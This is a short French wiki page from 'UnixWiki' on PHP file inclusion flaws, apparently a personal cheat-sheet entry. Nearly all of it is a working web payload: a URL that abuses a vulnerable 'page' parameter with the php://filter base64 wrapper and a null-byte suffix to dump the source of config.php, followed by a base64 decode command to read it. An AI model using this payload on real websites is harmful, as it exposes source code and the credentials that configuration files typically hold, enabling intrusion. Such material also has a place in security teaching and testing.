« 1.8 Failles include » : différence entre les versions

De UnixWiki
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
(Aucune différence)

Version du 20 juillet 2015 à 08:17

Lire un script PHP à la volé mettre dans l'include:

  http://www.pwnsite.com/index.php?page=php://filter/convert.base64-encode/resource=config.php%00

Reste plus qu'à le décoder pour avoir la page en clair

 echo "cHJvdXQ=" | base64 -d